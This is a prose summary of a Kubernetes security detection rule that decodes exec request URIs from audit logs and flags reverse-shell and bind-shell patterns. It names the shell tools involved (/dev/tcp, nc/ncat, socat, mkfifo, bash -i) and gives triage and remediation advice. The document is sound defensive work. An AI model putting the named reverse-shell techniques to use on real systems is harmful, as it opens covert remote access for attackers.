This ESQL-based rule watches Kubernetes audit logs for exec subresource usage and analyzes the request URI. It URL-decodes the request, parses the command fragment, and reconstructs the executed shell command. The rule then applies high-signal regex patterns that resemble reverse-shell or bind-shell one-liners (e.g., /dev/tcp, /dev/udp, nc/ncat, socat, mkfifo, bash -i, etc.) to flag potential post-exploitation interactive access inside a Pod. Local health-check or benign debugging patterns are excluded to reduce noise. When matched, the rule maps to MITRE ATT&CK techniques related to execution and command and scripting interpreters, aiding investigations into potential command-and-control activity within Kubernetes. The rule is intended for Kubernetes environments where pod/container exec is sensitive, and it offers triage guidance, false-positive considerations, and remediation steps such as terminating sessions, rotating credentials, and tightening exec permissions.